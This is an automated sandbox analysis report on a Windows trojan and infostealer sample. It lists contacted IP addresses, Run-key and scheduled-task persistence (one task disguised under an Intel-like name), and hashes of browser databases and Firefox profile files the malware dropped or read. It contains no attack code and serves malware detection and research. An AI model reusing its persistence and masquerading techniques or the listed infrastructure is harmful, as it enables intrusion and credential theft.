                                                                                                                                                                                                                              13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                              104.21.21.99
                                                                                                                                                                                                                              unknownUnited States
                                                                                                                                                                                                                              13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                              172.217.17.78
                                                                                                                                                                                                                              unknownUnited States
                                                                                                                                                                                                                              15169GOOGLEUSfalse
                                                                                                                                                                                                                              172.217.17.67
                                                                                                                                                                                                                              unknownUnited States
                                                                                                                                                                                                                              15169GOOGLEUSfalse
                                                                                                                                                                                                                              185.215.113.16
                                                                                                                                                                                                                              unknownPortugal
                                                                                                                                                                                                                              206894WHOLESALECONNECTIONSNLfalse
                                                                                                                                                                                                                              116.203.12.114
                                                                                                                                                                                                                              unknownGermany
                                                                                                                                                                                                                              24940HETZNER-ASDEfalse
                                                                                                                                                                                                                              20.233.83.145
                                                                                                                                                                                                                              unknownUnited States
                                                                                                                                                                                                                              8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                                                                              149.154.167.99
                                                                                                                                                                                                                              unknownUnited Kingdom
                                                                                                                                                                                                                              62041TELEGRAMRUfalse
                                                                                                                                                                                                                              142.250.181.132
                                                                                                                                                                                                                              unknownUnited States
                                                                                                                                                                                                                              15169GOOGLEUSfalse
                                                                                                                                                                                                                              34.226.108.155
                                                                                                                                                                                                                              unknownUnited States
                                                                                                                                                                                                                              14618AMAZON-AESUSfalse
                                                                                                                                                                                                                              239.255.255.250
                                                                                                                                                                                                                              unknownReserved
                                                                                                                                                                                                                              unknownunknownfalse
                                                                                                                                                                                                                              185.156.73.23
                                                                                                                                                                                                                              unknownRussian Federation
                                                                                                                                                                                                                              48817RELDAS-NETRUfalse
                                                                                                                                                                                                                              184.30.21.144
                                                                                                                                                                                                                              unknownUnited States
                                                                                                                                                                                                                              16625AKAMAI-ASUSfalse
                                                                                                                                                                                                                              185.215.113.206
                                                                                                                                                                                                                              unknownPortugal
                                                                                                                                                                                                                              206894WHOLESALECONNECTIONSNLfalse
                                                                                                                                                                                                                              64.233.162.84
                                                                                                                                                                                                                              unknownUnited States
                                                                                                                                                                                                                              15169GOOGLEUSfalse
                                                                                                                                                                                                                              142.250.181.99
                                                                                                                                                                                                                              unknownUnited States
                                                                                                                                                                                                                              15169GOOGLEUSfalse
                                                                                                                                                                                                                              184.30.17.174
                                                                                                                                                                                                                              unknownUnited States
                                                                                                                                                                                                                              16625AKAMAI-ASUSfalse
                                                                                                                                                                                                                              185.199.110.133
                                                                                                                                                                                                                              unknownNetherlands
                                                                                                                                                                                                                              54113FASTLYUSfalse
                                                                                                                                                                                                                              31.41.244.11
                                                                                                                                                                                                                              unknownRussian Federation
                                                                                                                                                                                                                              61974AEROEXPRESS-ASRUfalse
                                                                                                                                                                                                                              127.1.10.1
                                                                                                                                                                                                                              unknownunknown
                                                                                                                                                                                                                              unknownunknowntrue
                                                                                                                                                                                                                              IP
                                                                                                                                                                                                                              127.0.0.1
                                                                                                                                                                                                                              Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                                              Analysis ID:1579188
                                                                                                                                                                                                                              Start date and time:2024-12-21 03:12:09 +01:00
                                                                                                                                                                                                                              Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                              Overall analysis duration:0h 21m 3s
                                                                                                                                                                                                                              Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                              Report type:full
                                                                                                                                                                                                                              Cookbook file name:default.jbs
                                                                                                                                                                                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                                              Number of analysed new started processes analysed:63
                                                                                                                                                                                                                              Number of new started drivers analysed:0
                                                                                                                                                                                                                              Number of existing processes analysed:0
                                                                                                                                                                                                                              Number of existing drivers analysed:0
                                                                                                                                                                                                                              Number of injected processes analysed:0
                                                                                                                                                                                                                              Technologies:
                                                                                                                                                                                                                              • HCA enabled
                                                                                                                                                                                                                              • EGA enabled
                                                                                                                                                                                                                              • AMSI enabled
                                                                                                                                                                                                                              Analysis Mode:default
                                                                                                                                                                                                                              Sample name:file.exe
                                                                                                                                                                                                                              Detection:MAL
                                                                                                                                                                                                                              Classification:mal100.troj.spyw.evad.mine.winEXE@132/124@0/23
                                                                                                                                                                                                                              EGA Information:
                                                                                                                                                                                                                              • Successful, ratio: 50%
                                                                                                                                                                                                                              HCA Information:
                                                                                                                                                                                                                              • Successful, ratio: 55%
                                                                                                                                                                                                                              • Number of executed functions: 240
                                                                                                                                                                                                                              • Number of non-executed functions: 198
                                                                                                                                                                                                                              Cookbook Comments:
                                                                                                                                                                                                                              • Found application associated with file extension: .exe
                                                                                                                                                                                                                              • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                                                                                                                                                                                              • Max analysis timeout: 600s exceeded, the analysis took too long
                                                                                                                                                                                                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, Conhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
                                                                                                                                                                                                                              • Execution Graph export aborted for target 4268204ace.exe, PID 7312 because it is empty
                                                                                                                                                                                                                              • Execution Graph export aborted for target explorer.exe, PID 2368 because there are no executed function
                                                                                                                                                                                                                              • Execution Graph export aborted for target powershell.exe, PID 1020 because it is empty
                                                                                                                                                                                                                              • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                                              • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                                                                                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                                              • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                                                                                              • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                                                                                              • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                                                                                                                              • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                                                                                                                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                                                              • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                                                                                                                              • Report size getting too big, too many NtQueryDirectoryFile calls found.
                                                                                                                                                                                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                                              • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                                                                                                                              • Skipping network analysis since amount of network traffic is too extensive
                                                                                                                                                                                                                              TimeTypeDescription
                                                                                                                                                                                                                              02:13:05Task SchedulerRun new task: skotes path: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                              02:14:31Task SchedulerRun new task: Intel_PTT_EK_Recertification path: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe
                                                                                                                                                                                                                              02:15:02AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run 77594b3442.exe C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exe
                                                                                                                                                                                                                              02:15:12AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run 77594b3442.exe C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exe
                                                                                                                                                                                                                              02:15:21AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run 513dad5c05.exe C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exe
                                                                                                                                                                                                                              02:15:30AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run 9d4ddc637a.exe C:\Users\user\AppData\Local\Temp\1019033001\9d4ddc637a.exe
                                                                                                                                                                                                                              02:15:39AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run ce29828af5.exe C:\Users\user\AppData\Local\Temp\1019034001\ce29828af5.exe
                                                                                                                                                                                                                              02:15:52AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run 513dad5c05.exe C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exe
                                                                                                                                                                                                                              02:16:01AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run 9d4ddc637a.exe C:\Users\user\AppData\Local\Temp\1019033001\9d4ddc637a.exe
                                                                                                                                                                                                                              02:16:11AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run ce29828af5.exe C:\Users\user\AppData\Local\Temp\1019034001\ce29828af5.exe
                                                                                                                                                                                                                              02:17:13Task SchedulerRun new task: ServiceData4 path: C:\Users\user\AppData\Local\Temp\/service123.exe
                                                                                                                                                                                                                              02:20:18AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run 2e4e95ff2a.exe C:\Users\user\AppData\Local\Temp\1019045001\2e4e95ff2a.exe
                                                                                                                                                                                                                              02:20:27AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run d850ccdb8a.exe C:\Users\user\AppData\Local\Temp\1019046001\d850ccdb8a.exe
                                                                                                                                                                                                                              02:20:35AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run c2cce73e6e.exe C:\Users\user\AppData\Local\Temp\1019047001\c2cce73e6e.exe
                                                                                                                                                                                                                              02:20:43AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run bb72915ca9.exe C:\Users\user\AppData\Local\Temp\1019048001\bb72915ca9.exe
                                                                                                                                                                                                                              02:20:51AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run 2e4e95ff2a.exe C:\Users\user\AppData\Local\Temp\1019045001\2e4e95ff2a.exe
                                                                                                                                                                                                                              02:21:00AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run d850ccdb8a.exe C:\Users\user\AppData\Local\Temp\1019046001\d850ccdb8a.exe
                                                                                                                                                                                                                              02:21:08AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run c2cce73e6e.exe C:\Users\user\AppData\Local\Temp\1019047001\c2cce73e6e.exe
                                                                                                                                                                                                                              02:21:16AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run bb72915ca9.exe C:\Users\user\AppData\Local\Temp\1019048001\bb72915ca9.exe
                                                                                                                                                                                                                              21:14:03API Interceptor17110346x Sleep call for process: skotes.exe modified
                                                                                                                                                                                                                              21:14:30API Interceptor43x Sleep call for process: powershell.exe modified
                                                                                                                                                                                                                              21:14:37API Interceptor60x Sleep call for process: 4268204ace.exe modified
                                                                                                                                                                                                                              21:14:45API Interceptor3x Sleep call for process: svchost.exe modified
                                                                                                                                                                                                                              21:14:59API Interceptor78x Sleep call for process: 77594b3442.exe modified
                                                                                                                                                                                                                              21:15:13API Interceptor504049x Sleep call for process: 9c2981f3e5.exe modified
                                                                                                                                                                                                                              21:15:20API Interceptor30221x Sleep call for process: 0577f55121.exe modified
                                                                                                                                                                                                                              21:15:41API Interceptor104x Sleep call for process: 513dad5c05.exe modified
                                                                                                                                                                                                                              No context
                                                                                                                                                                                                                              No context
                                                                                                                                                                                                                              No context
                                                                                                                                                                                                                              No context
                                                                                                                                                                                                                              No context
                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exe
                                                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):49152
                                                                                                                                                                                                                              Entropy (8bit):0.8180424350137764
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                                                                                                                              MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                                                                                                                              SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                                                                                                                              SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                                                                                                                              SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exe
                                                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):40960
                                                                                                                                                                                                                              Entropy (8bit):0.8553638852307782
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                                                                              MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                                                                              SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                                                                              SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                                                                              SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exe
                                                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):106496
                                                                                                                                                                                                                              Entropy (8bit):1.1358696453229276
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                                                                                              MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                                                                                              SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                                                                                              SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                                                                                              SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exe
                                                                                                                                                                                                                              File Type:SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):5242880
                                                                                                                                                                                                                              Entropy (8bit):0.037963276276857943
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:58rJQaXoMXp0VW9FxWZWdgokBQNba9D3DO/JxW/QHI:58r54w0VW3xWZWdOBQFal3dQ
                                                                                                                                                                                                                              MD5:C0FDF21AE11A6D1FA1201D502614B622
                                                                                                                                                                                                                              SHA1:11724034A1CC915B061316A96E79E9DA6A00ADE8
                                                                                                                                                                                                                              SHA-256:FD4EB46C81D27A9B3669C0D249DF5CE2B49E5F37B42F917CA38AB8831121ADAC
                                                                                                                                                                                                                              SHA-512:A6147C196B033725018C7F28C1E75E20C2113A0C6D8172F5EABCB8FF334EA6CE10B758FFD1D22D50B4DB5A0A21BCC15294AC44E94D973F7A3EB9F8558F31769B
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:SQLite format 3......@ ...................&...................K..................................j.....-a>.~...|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exe
                                                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):114688
                                                                                                                                                                                                                              Entropy (8bit):0.9746603542602881
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                                                                              MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                                                                              SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                                                                              SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                                                                              SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exe
                                                                                                                                                                                                                              File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):98304
                                                                                                                                                                                                                              Entropy (8bit):0.08235737944063153
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                                                                                                                                                              MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                                                                                                                                                              SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                                                                                                                                                              SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                                                                                                                                                              SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exe
                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (1809), with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):11848
                                                                                                                                                                                                                              Entropy (8bit):5.484261456046099
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:vnaRtLYbBp6ihj4qyaaX86KaNhe5RfGNBw8dYSl:aeAqu74cwL0
                                                                                                                                                                                                                              MD5:BBEB86C24FD7C0EFC3E670479AFE9A78
                                                                                                                                                                                                                              SHA1:AC210D1932735D1515D31162A1BD034C0CCC1C2B
                                                                                                                                                                                                                              SHA-256:9DEF6586D9D4BF7557D1BCDB4830641AF8ACEBB7301575ECEE0EEE8B4AB67FDA
                                                                                                                                                                                                                              SHA-512:60CA5A7FED1015263B4FD33485D82F160B424D4FB068BFD9D99913FACED16D61C1463F23311562B020CEB2B72A2CC9349AE9EC0F9B56CBA1A91FA3DF9836738F
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "57f16a19-e119-4073-bf01-28f88011f783");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.backgroundErrors", 1);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696333830);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1734747327);..user_pref("app.up
                                                                                                                                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                              File Type:Extensible storage engine DataBase, version 0x620, checksum 0xab69afc7, page size 16384, Windows version 10.0
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1310720
                                                                                                                                                                                                                              Entropy (8bit):0.42216175025113467
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:1536:HSB2ESB2SSjlK/uedMrSU0OrsJzvqYkr3g16f2UPkLk+ku4/Iw4KKazAkUk1k2DO:Hazag03A2UrzJDO
                                                                                                                                                                                                                              MD5:2FFA786B649D46A495E4E034A6604D76
                                                                                                                                                                                                                              SHA1:B548B974ABFFEC8AD72EE2510D58D4DC85A03DD3
                                                                                                                                                                                                                              SHA-256:63F9F28CB8EB913DDF0BF009414B5E3FA500CECD88EA9D6382746A6E2AD9A903
                                                                                                                                                                                                                              SHA-512:A323991F1EA13B6D17CEFB9474D658E01C91CB055F1FF9BA91EF990ED15EC887B2FC0E05D59DC34DB6398F9122AC91B3D0665B97D26186411C8F98E353D12F3A
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:.i..... .......Y.......X\...;...{......................n.%..........|o......|S.h.#..........|o.n.%.........D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ............................................................................................................................................................................................................2...{....................................$......|o...................l......|o..........................#......n.%.....................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exe
                                                                                                                                                                                                                              File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):98304
                                                                                                                                                                                                                              Entropy (8bit):0.08235737944063153
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                                                                                                                                                              MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                                                                                                                                                              SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                                                                                                                                                              SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                                                                                                                                                              SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exe
                                                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):159744
                                                                                                                                                                                                                              Entropy (8bit):0.7873599747470391
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
                                                                                                                                                                                                                              MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                                                                                                                                                                                                                              SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                                                                                                                                                                                                                              SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                                                                                                                                                                                                                              SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exe
                                                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):114688
                                                                                                                                                                                                                              Entropy (8bit):0.9746603542602881
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                                                                              MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                                                                              SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                                                                              SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                                                                              SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exe
                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (1809), with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):11644
                                                                                                                                                                                                                              Entropy (8bit):5.480461933159794
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:jnaRtLYbBp6ihj4qyaaX86KaNhe5RfGNBw8dJSl:GeAqu74cwm0
                                                                                                                                                                                                                              MD5:4EC300E00A4F8A4AE9B53EE29A1069F8
                                                                                                                                                                                                                              SHA1:CC40AF90133FFCBCFB801C64EA5ADBA759EB7CDF
                                                                                                                                                                                                                              SHA-256:BF9ED5F15E42263C4782B2EE1043FE64D1EC8FD8A31724B1EFE11FD7BCCC9528
                                                                                                                                                                                                                              SHA-512:F1D21131AAA330831D0AA2AF9176E0BA417D783B9E4D068278D9ECD717D8086E90DB64A0B30674B701DFDCC9B2D2071C4C4073D109958D09A27D77286999C43F
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
